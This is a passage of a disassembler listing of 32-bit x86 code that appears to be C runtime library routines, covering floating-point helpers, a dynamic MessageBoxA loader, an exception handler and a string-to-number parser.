fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_416822
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4168F6: ; CODE XREF: sub_4168C2+A�j
push 0FFFFh
push [ebp+arg_C]
mov dword_4C5904, 21h
call sub_416B3F
fld [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_4168C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_416914(int,int,double,double,int)
sub_416914 proc near ; CODE XREF: sub_4142AA:loc_41436F�p
; sub_4143E1:loc_4144A6�p
var_9C = qword ptr -9Ch
var_94 = qword ptr -94h
var_8C = qword ptr -8Ch
var_84 = dword ptr -84h
var_80 = byte ptr -80h
var_40 = dword ptr -40h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 80h
mov eax, dword_421360
xor eax, [ebp+4]
push [ebp+arg_18]
mov [esp+84h+var_4], eax
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_4165AD
add esp, 0Ch
test eax, eax
jnz short loc_416969
and [esp+80h+var_40], 0FFFFFFFEh
lea eax, [ebp+arg_10]
push eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_18]
push [ebp+arg_0]
push eax
lea eax, [esp+94h+var_80]
push eax
call sub_416308
add esp, 18h
loc_416969: ; CODE XREF: sub_416914+2F�j
push [ebp+arg_0]
call sub_4167F5
add esp, 4
cmp dword_421668, 0
jnz short loc_4169A8
test eax, eax
jz short loc_4169A8
push [ebp+arg_18] ; int
fld [ebp+arg_10]
sub esp, 18h
fstp [esp+9Ch+var_8C]
fldz
fstp [esp+9Ch+var_94]
fld [ebp+arg_8]
fstp [esp+9Ch+var_9C]
push [ebp+arg_4] ; int
push eax ; int
call sub_416822
add esp, 24h
jmp short loc_4169C2
; ---------------------------------------------------------------------------
loc_4169A8: ; CODE XREF: sub_416914+67�j
; sub_416914+6B�j
push eax
call sub_4167CF
mov [esp+84h+var_84], 0FFFFh
push [ebp+arg_18]
call sub_416B3F
fld [ebp+arg_10]
pop ecx
pop ecx
loc_4169C2: ; CODE XREF: sub_416914+92�j
mov ecx, [esp+80h+var_4]
xor ecx, [ebp+4]
call sub_411BA5
mov esp, ebp
pop ebp
retn
sub_416914 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4169D2(double)
sub_4169D2 proc near ; CODE XREF: sub_4142AA:loc_414330�p
; sub_4143E1:loc_414467�p
var_8 = qword ptr -8
arg_0 = qword ptr 4
push ecx
push ecx
fld [esp+8+arg_0]
frndint
fstp [esp+8+var_8]
fld [esp+8+var_8]
pop ecx
pop ecx
retn
sub_4169D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4169E5(double,int)
sub_4169E5 proc near ; CODE XREF: sub_416A6A+80�p
; sub_416A6A+93�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
fld [ebp+arg_0]
mov ecx, dword ptr [ebp+arg_0+6]
fstp [ebp+var_8]
add eax, 3FEh
shl eax, 4
and ecx, 0FFFF800Fh
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_4169E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416A0F proc near ; CODE XREF: sub_4142AA+31�p
; sub_4143E1+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_416A27
cmp [ebp+arg_0], edx
jnz short loc_416A39
xor eax, eax
inc eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_416A27: ; CODE XREF: sub_416A0F+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_416A39
cmp [ebp+arg_0], edx
jnz short loc_416A39
push 2
jmp short loc_416A63
; ---------------------------------------------------------------------------
loc_416A39: ; CODE XREF: sub_416A0F+11�j
; sub_416A0F+1F�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_416A4C
push 3
jmp short loc_416A63
; ---------------------------------------------------------------------------
loc_416A4C: ; CODE XREF: sub_416A0F+37�j
cmp cx, 7FF0h
jnz short loc_416A66
test [ebp+arg_4], 7FFFFh
jnz short loc_416A61
cmp [ebp+arg_0], edx
jz short loc_416A66
loc_416A61: ; CODE XREF: sub_416A0F+4B�j
push 4
loc_416A63: ; CODE XREF: sub_416A0F+28�j
; sub_416A0F+3B�j
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_416A66: ; CODE XREF: sub_416A0F+42�j
; sub_416A0F+50�j
xor eax, eax
pop ebp
retn
sub_416A0F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_416A6A(double,int)
sub_416A6A proc near ; CODE XREF: sub_4165AD+164�p
var_14 = qword ptr -14h
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
fcomp dbl_41BC80
fnstsw ax
test ah, 44h
jp short loc_416A88
fldz
xor edx, edx
jmp loc_416B17
; ---------------------------------------------------------------------------
loc_416A88: ; CODE XREF: sub_416A6A+13�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_416AF4
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_416AA0
cmp dword ptr [ebp+arg_0], ecx
jz short loc_416AF4
loc_416AA0: ; CODE XREF: sub_416A6A+2F�j
fld [ebp+arg_0]
mov edx, 0FFFFFC03h
fcomp dbl_41BC80
fnstsw ax
test ah, 5
jp short loc_416ABA
xor eax, eax
inc eax
jmp short loc_416ACF
; ---------------------------------------------------------------------------
loc_416ABA: ; CODE XREF: sub_416A6A+49�j
xor eax, eax
jmp short loc_416ACF
; ---------------------------------------------------------------------------
loc_416ABE: ; CODE XREF: sub_416A6A+69�j
shl dword ptr [ebp+arg_0+4], 1
test byte ptr [ebp+arg_0+3], 80h
jz short loc_416ACB
or dword ptr [ebp+arg_0+4], 1
loc_416ACB: ; CODE XREF: sub_416A6A+5B�j
shl dword ptr [ebp+arg_0], 1
dec edx
loc_416ACF: ; CODE XREF: sub_416A6A+4E�j
; sub_416A6A+52�j
test byte ptr [ebp+arg_0+6], 10h
jz short loc_416ABE
and byte ptr [ebp+arg_0+6], 0EFh
cmp eax, ecx
jz short loc_416AE1
or byte ptr [ebp+arg_0+7], 80h
loc_416AE1: ; CODE XREF: sub_416A6A+71�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+14h+var_14]
call sub_4169E5
add esp, 0Ch
jmp short loc_416B17
; ---------------------------------------------------------------------------
loc_416AF4: ; CODE XREF: sub_416A6A+26�j
; sub_416A6A+34�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+14h+var_14]
call sub_4169E5
mov edx, dword ptr [ebp+arg_0+6]
shr edx, 4
and edx, 7FFh
add esp, 0Ch
sub edx, 3FEh
loc_416B17: ; CODE XREF: sub_416A6A+19�j
; sub_416A6A+88�j
mov eax, [ebp+arg_8]
fstp [ebp+var_8]
fld [ebp+var_8]
mov [eax], edx
leave
retn
sub_416A6A endp
; =============== S U B R O U T I N E =======================================
sub_416B24 proc near ; CODE XREF: sub_416308+DE�p
var_4 = word ptr -4
push ecx
fstsw [esp+4+var_4]
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_416B24 endp
; =============== S U B R O U T I N E =======================================
sub_416B31 proc near ; CODE XREF: sub_416308+1E6�p
var_4 = word ptr -4
push ecx
fnstsw [esp+4+var_4]
fnclex
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_416B31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416B3F proc near ; CODE XREF: sub_4142AA+13�p
; sub_4142AA+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
and ecx, [ebp+arg_4]
not eax
and eax, [ebp+var_4]
or eax, ecx
mov [ebp+arg_4], eax
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_416B3F endp
; =============== S U B R O U T I N E =======================================
sub_416B63 proc near ; CODE XREF: sub_4165AD+20�p
; sub_4165AD+3A�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 4
push ecx
push ecx
mov cl, byte ptr [esp+8+arg_0]
test cl, 1
jz short loc_416B79
fld tbyte_421780
fistp [esp+8+arg_0]
wait
loc_416B79: ; CODE XREF: sub_416B63+9�j
test cl, 8
jz short loc_416B8F
fstsw ax
fld tbyte_421780
fstp [esp+8+var_8]
wait
fstsw ax
loc_416B8F: ; CODE XREF: sub_416B63+19�j
test cl, 10h
jz short loc_416B9F
fld tbyte_42178C
fstp [esp+8+var_8]
wait
loc_416B9F: ; CODE XREF: sub_416B63+2F�j
test cl, 4
jz short loc_416BAD
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_416BAD: ; CODE XREF: sub_416B63+3F�j
test cl, 20h
jz short loc_416BB9
fldpi
fstp [esp+8+var_8]
wait
loc_416BB9: ; CODE XREF: sub_416B63+4D�j
pop ecx
pop ecx
retn
sub_416B63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416BBC proc near ; CODE XREF: sub_4144B2+132�p
; sub_41533C+13A�p
var_10 = byte ptr -10h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_A = byte ptr 12h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp dword_4C5B14, ebx
push esi
push edi
jnz short loc_416C3C
push offset aUser32_dll ; "user32.dll"
call dword_4190F0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_416C77
mov esi, dword_4190F8
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_4C5B14, eax
jz short loc_416C77
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_4C5B18, eax
call esi ; GetProcAddress
cmp dword_4C5910, 2
mov dword_4C5B1C, eax
jnz short loc_416C3C
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_4C5B24, eax
jz short loc_416C3C
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi ; GetProcAddress
mov dword_4C5B20, eax
loc_416C3C: ; CODE XREF: sub_416BBC+11�j
; sub_416BBC+60�j ...
mov eax, dword_4C5B20
test eax, eax
jz short loc_416C81
call eax
test eax, eax
jz short loc_416C68
lea ecx, [ebp+var_4]
push ecx
push 0Ch
lea ecx, [ebp+var_10]
push ecx
push 1
push eax
call dword_4C5B24
test eax, eax
jz short loc_416C68
test [ebp+var_8], 1
jnz short loc_416C81
loc_416C68: ; CODE XREF: sub_416BBC+8D�j
; sub_416BBC+A4�j
cmp dword_4C591C, 4
jb short loc_416C7B
or [ebp+arg_A], 20h
jmp short loc_416CA0
; ---------------------------------------------------------------------------
loc_416C77: ; CODE XREF: sub_416BBC+22�j
; sub_416BBC+3D�j
xor eax, eax
jmp short loc_416CB0
; ---------------------------------------------------------------------------
loc_416C7B: ; CODE XREF: sub_416BBC+B3�j
or [ebp+arg_A], 4
jmp short loc_416CA0
; ---------------------------------------------------------------------------
loc_416C81: ; CODE XREF: sub_416BBC+87�j
; sub_416BBC+AA�j
mov eax, dword_4C5B18
test eax, eax
jz short loc_416CA0
call eax
mov ebx, eax
test ebx, ebx
jz short loc_416CA0
mov eax, dword_4C5B1C
test eax, eax
jz short loc_416CA0
push ebx
call eax
mov ebx, eax
loc_416CA0: ; CODE XREF: sub_416BBC+B9�j
; sub_416BBC+C3�j ...
push dword ptr [ebp+10h]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call dword_4C5B14
loc_416CB0: ; CODE XREF: sub_416BBC+BD�j
pop edi
pop esi
pop ebx
leave
retn
sub_416BBC endp
; =============== S U B R O U T I N E =======================================
sub_416CB5 proc near ; CODE XREF: sub_416CE6+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_4C5B81[eax], cl
jnz short loc_416CE2
cmp [esp+arg_4], 0
jz short loc_416CDB
movzx eax, word_41BD02[eax*2]
and eax, [esp+arg_4]
jmp short loc_416CDD
; ---------------------------------------------------------------------------
loc_416CDB: ; CODE XREF: sub_416CB5+16�j
xor eax, eax
loc_416CDD: ; CODE XREF: sub_416CB5+24�j
test eax, eax
jnz short loc_416CE2
retn
; ---------------------------------------------------------------------------
loc_416CE2: ; CODE XREF: sub_416CB5+F�j
; sub_416CB5+2A�j
xor eax, eax
inc eax
retn
sub_416CB5 endp
; =============== S U B R O U T I N E =======================================
sub_416CE6 proc near ; CODE XREF: sub_4147D3+35�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_416CB5
add esp, 0Ch
retn
sub_416CE6 endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D00 proc near ; DATA XREF: __SEH_prolog�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_416DA0
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_416D33: ; CODE XREF: sub_416D00+90�j
cmp esi, 0FFFFFFFFh
jz short loc_416D99
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_416D87
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_416D87
js short loc_416D92
mov edi, [ebx+8]
push ebx
call sub_40F144
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_40F186
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_40F21A
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_416D87: ; CODE XREF: sub_416D00+40�j
; sub_416D00+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_416D33
; ---------------------------------------------------------------------------
loc_416D92: ; CODE XREF: sub_416D00+54�j
mov eax, 0
jmp short loc_416DB5
; ---------------------------------------------------------------------------
loc_416D99: ; CODE XREF: sub_416D00+36�j
mov eax, 1
jmp short loc_416DB5
; ---------------------------------------------------------------------------
loc_416DA0: ; CODE XREF: sub_416D00+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_40F186
add esp, 8
pop ebp
mov eax, 1
loc_416DB5: ; CODE XREF: sub_416D00+97�j
; sub_416D00+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_416D00 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_40F186
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_416DD8 proc near ; CODE XREF: sub_4154B8+23�p
; sub_4154B8+3A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
lea ecx, [edx+esi]
xor eax, eax
cmp ecx, edx
jb short loc_416DEE
cmp ecx, esi
jnb short loc_416DF1
loc_416DEE: ; CODE XREF: sub_416DD8+10�j
xor eax, eax
inc eax
loc_416DF1: ; CODE XREF: sub_416DD8+14�j
mov edx, [esp+4+arg_8]
mov [edx], ecx
pop esi
retn
sub_416DD8 endp
; =============== S U B R O U T I N E =======================================
sub_416DF9 proc near ; CODE XREF: sub_416EB2+4B�p
; sub_416EB2+6C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_416DD8
add esp, 0Ch
test eax, eax
jz short loc_416E2B
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_416DD8
add esp, 0Ch
test eax, eax
jz short loc_416E2B
inc dword ptr [esi+8]
loc_416E2B: ; CODE XREF: sub_416DF9+19�j
; sub_416DF9+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_416DD8
add esp, 0Ch
test eax, eax
jz short loc_416E43
inc dword ptr [esi+8]
loc_416E43: ; CODE XREF: sub_416DF9+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_416DD8
add esp, 0Ch
pop edi
pop esi
retn
sub_416DF9 endp
; =============== S U B R O U T I N E =======================================
sub_416E57 proc near ; CODE XREF: sub_416EB2+3B�p
; sub_416EB2+41�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, [eax]
mov ecx, esi
add esi, esi
push edi
mov edi, [eax+4]
shr ecx, 1Fh
mov [eax], esi
lea esi, [edi+edi]
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+4], esi
mov [eax+8], ecx
pop esi
retn
sub_416E57 endp
; =============== S U B R O U T I N E =======================================
sub_416E85 proc near ; CODE XREF: sub_417423+1C1�p
; sub_417975+18A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov edx, [eax+8]
mov ecx, [eax+4]
push esi
push edi
mov edi, ecx
mov esi, edx
shr ecx, 1
shl esi, 1Fh
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
or ecx, edi
shr edx, 1
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_416E85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416EB2 proc near ; CODE XREF: sub_416F96+3B5�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_421360
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
cmp eax, edx
push esi
push edi
mov [ebp+var_8], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_416F30
mov [ebp+arg_8], eax
loc_416EE4: ; CODE XREF: sub_416EB2+7A�j
mov esi, ebx
lea edi, [ebp+var_14]
movsd
movsd
push ebx
movsd
call sub_416E57
push ebx
call sub_416E57
lea eax, [ebp+var_14]
push eax
push ebx
call sub_416DF9
push ebx
call sub_416E57
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
push eax
push ebx
call sub_416DF9
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_416EE4
xor edx, edx
loc_416F30: ; CODE XREF: sub_416EB2+2D�j
cmp [ebx+8], edx
jnz short loc_416F64
mov edi, [ebx+8]
loc_416F38: ; CODE XREF: sub_416EB2+AD�j
mov ecx, [ebx+4]
add [ebp+var_8], 0FFF0h
mov eax, ecx
shr eax, 10h
mov edi, eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
cmp edi, edx
mov [ebx+4], esi
mov [ebx], eax
jz short loc_416F38
mov [ebx+8], edi
loc_416F64: ; CODE XREF: sub_416EB2+81�j
mov esi, 8000h
jmp short loc_416F79
; ---------------------------------------------------------------------------
loc_416F6B: ; CODE XREF: sub_416EB2+CA�j
push ebx
call sub_416E57
add [ebp+var_8], 0FFFFh
pop ecx
loc_416F79: ; CODE XREF: sub_416EB2+B7�j
test [ebx+8], esi
jz short loc_416F6B
mov ecx, [ebp+var_4]
mov ax, word ptr [ebp+var_8]
xor ecx, [ebp+4]
pop edi
pop esi
mov [ebx+0Ah], ax
pop ebx
call sub_411BA5
leave
retn
sub_416EB2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F96 proc near ; CODE XREF: sub_4157AA+22�p
; sub_4157ED+22�p
var_58 = byte ptr -58h
var_41 = byte ptr -41h
var_3C = dword ptr -3Ch
var_36 = dword ptr -36h
var_32 = dword ptr -32h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
mov eax, dword_421360
xor eax, [ebp+4]
push ebx
mov [ebp+var_4], eax
lea eax, [ebp+var_58]
push esi
mov [ebp+var_10], eax
xor eax, eax
xor edx, edx
push edi
mov edi, [ebp+arg_8]
inc edx
mov [ebp+var_2C], eax
mov [ebp+var_1C], edx
mov [ebp+var_8], eax
mov [ebp+var_14], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_C], eax
mov [ebp+var_18], eax
mov [ebp+arg_8], edi
loc_416FD6: ; CODE XREF: sub_416F96+57�j
mov cl, [edi]
cmp cl, 20h
jz short loc_416FEC
cmp cl, 9
jz short loc_416FEC
cmp cl, 0Ah
jz short loc_416FEC
cmp cl, 0Dh
jnz short loc_416FEF
loc_416FEC: ; CODE XREF: sub_416F96+45�j
; sub_416F96+4A�j ...
inc edi
jmp short loc_416FD6
; ---------------------------------------------------------------------------
loc_416FEF: ; CODE XREF: sub_416F96+54�j
push 4
pop esi
loc_416FF2: ; CODE XREF: sub_416F96+B4�j
; sub_416F96+BD�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_417266 ; default
; jumptable 00416FFE case 10
jmp off_4173F3[eax*4] ; switch jump
loc_417005: ; DATA XREF: .text:off_4173F3�o
cmp bl, 31h ; jumptable 00416FFE case 0
jl short loc_417016
cmp bl, 39h
jg short loc_417016
loc_41700F: ; CODE XREF: sub_416F96+CA�j
; sub_416F96+112�j
push 3
jmp loc_41721E
; ---------------------------------------------------------------------------
loc_417016: ; CODE XREF: sub_416F96+72�j
; sub_416F96+77�j
cmp bl, byte_4214F8
jnz short loc_417025
loc_41701E: ; CODE XREF: sub_416F96+11E�j
push 5
jmp loc_41725C
; ---------------------------------------------------------------------------
loc_417025: ; CODE XREF: sub_416F96+86�j
movsx eax, bl
sub eax, 2Bh
jz short loc_41704C
dec eax
dec eax
jz short loc_417040
sub eax, 3
jz loc_4170C3
loc_41703A: ; CODE XREF: sub_416F96+EA�j
; sub_416F96+F4�j ...
dec edi
jmp loc_4172F9
; ---------------------------------------------------------------------------
loc_417040: ; CODE XREF: sub_416F96+99�j
push 2
pop eax
mov [ebp+var_2C], 8000h
jmp short loc_416FF2
; ---------------------------------------------------------------------------
loc_41704C: ; CODE XREF: sub_416F96+95�j
and [ebp+var_2C], 0
push 2
pop eax
jmp short loc_416FF2
; ---------------------------------------------------------------------------
loc_417055: ; CODE XREF: sub_416F96+68�j
; DATA XREF: .text:off_4173F3�o
cmp bl, 31h ; jumptable 00416FFE case 1
mov [ebp+var_14], edx
jl short loc_417062
cmp bl, 39h
jle short loc_41700F
loc_417062: ; CODE XREF: sub_416F96+C5�j
cmp bl, byte_4214F8
jz loc_41711C
cmp bl, 2Bh
jz short loc_417098
cmp bl, 2Dh
jz short loc_417098
cmp bl, 30h
jz short loc_4170C3
loc_41707D: ; CODE XREF: sub_416F96+1FD�j
cmp bl, 43h
jle short loc_41703A
cmp bl, 45h
jle short loc_417091
cmp bl, 63h
jle short loc_41703A
cmp bl, 65h
jg short loc_41703A
loc_417091: ; CODE XREF: sub_416F96+EF�j
push 6
jmp loc_41725C
; ---------------------------------------------------------------------------
loc_417098: ; CODE XREF: sub_416F96+DB�j
; sub_416F96+E0�j ...
dec edi
push 0Bh
jmp loc_41725C
; ---------------------------------------------------------------------------
loc_4170A0: ; CODE XREF: sub_416F96+68�j
; DATA XREF: .text:off_4173F3�o
cmp bl, 31h ; jumptable 00416FFE case 2
jl short loc_4170AE
cmp bl, 39h
jle loc_41700F
loc_4170AE: ; CODE XREF: sub_416F96+10D�j
cmp bl, byte_4214F8
jz loc_41701E
cmp bl, 30h
jnz loc_41722A
loc_4170C3: ; CODE XREF: sub_416F96+9E�j
; sub_416F96+E5�j
mov eax, edx
jmp loc_416FF2
; ---------------------------------------------------------------------------
loc_4170CA: ; CODE XREF: sub_416F96+68�j
; DATA XREF: .text:off_4173F3�o
mov [ebp+var_14], edx ; jumptable 00416FFE case 3
loc_4170CD: ; CODE XREF: sub_416F96+17C�j
cmp dword_4214F4, edx
movzx eax, bl
jle short loc_4170E6
push esi
push eax
call sub_41328D
pop ecx
xor edx, edx
pop ecx
inc edx
jmp short loc_4170F2
; ---------------------------------------------------------------------------
loc_4170E6: ; CODE XREF: sub_416F96+140�j
mov ecx, off_4214EC
movzx eax, byte ptr [ecx+eax*2]
and eax, esi
loc_4170F2: ; CODE XREF: sub_416F96+14E�j
test eax, eax
jz short loc_417114
cmp [ebp+var_8], 19h
jnb short loc_41710C
mov eax, [ebp+var_10]
inc [ebp+var_8]
sub bl, 30h
inc [ebp+var_10]
mov [eax], bl
jmp short loc_41710F
; ---------------------------------------------------------------------------
loc_41710C: ; CODE XREF: sub_416F96+164�j
inc [ebp+var_C]
loc_41710F: ; CODE XREF: sub_416F96+174�j
mov bl, [edi]
inc edi
jmp short loc_4170CD
; ---------------------------------------------------------------------------
loc_417114: ; CODE XREF: sub_416F96+15E�j
cmp bl, byte_4214F8
jnz short loc_417181
loc_41711C: ; CODE XREF: sub_416F96+D2�j
mov eax, esi
jmp loc_416FF2
; ---------------------------------------------------------------------------
loc_417123: ; CODE XREF: sub_416F96+68�j
; DATA XREF: .text:off_4173F3�o
cmp [ebp+var_8], 0 ; jumptable 00416FFE case 4
mov [ebp+var_14], edx
mov [ebp+var_28], edx
jnz short loc_41713C
jmp short loc_417137
; ---------------------------------------------------------------------------
loc_417131: ; CODE XREF: sub_416F96+1A4�j
dec [ebp+var_C]
mov bl, [edi]
inc edi
loc_417137: ; CODE XREF: sub_416F96+199�j
cmp bl, 30h
jz short loc_417131
loc_41713C: ; CODE XREF: sub_416F96+197�j
; sub_416F96+1E9�j
cmp dword_4214F4, edx
movzx eax, bl
jle short loc_417155
push esi
push eax
call sub_41328D
pop ecx
xor edx, edx
pop ecx
inc edx
jmp short loc_417161
; ---------------------------------------------------------------------------
loc_417155: ; CODE XREF: sub_416F96+1AF�j
mov ecx, off_4214EC
movzx eax, byte ptr [ecx+eax*2]
and eax, esi
loc_417161: ; CODE XREF: sub_416F96+1BD�j
test eax, eax
jz short loc_417181
cmp [ebp+var_8], 19h
jnb short loc_41717C
inc [ebp+var_8]
mov eax, [ebp+var_10]
sub bl, 30h
inc [ebp+var_10]
dec [ebp+var_C]
mov [eax], bl
loc_41717C: ; CODE XREF: sub_416F96+1D3�j
mov bl, [edi]
inc edi
jmp short loc_41713C
; ---------------------------------------------------------------------------
loc_417181: ; CODE XREF: sub_416F96+184�j
; sub_416F96+1CD�j
cmp bl, 2Bh
jz loc_417098
cmp bl, 2Dh
jz loc_417098
jmp loc_41707D
; ---------------------------------------------------------------------------
loc_417198: ; CODE XREF: sub_416F96+68�j
; DATA XREF: .text:off_4173F3�o
cmp dword_4214F4, edx ; jumptable 00416FFE case 5
mov [ebp+var_28], edx
movzx eax, bl
jle short loc_4171B4
push esi
push eax
call sub_41328D
pop ecx
xor edx, edx
pop ecx
inc edx
jmp short loc_4171C0
; ---------------------------------------------------------------------------
loc_4171B4: ; CODE XREF: sub_416F96+20E�j
mov ecx, off_4214EC
movzx eax, byte ptr [ecx+eax*2]
and eax, esi
loc_4171C0: ; CODE XREF: sub_416F96+21C�j
test eax, eax
jz short loc_41722A
mov eax, esi
jmp short loc_41721F
; ---------------------------------------------------------------------------
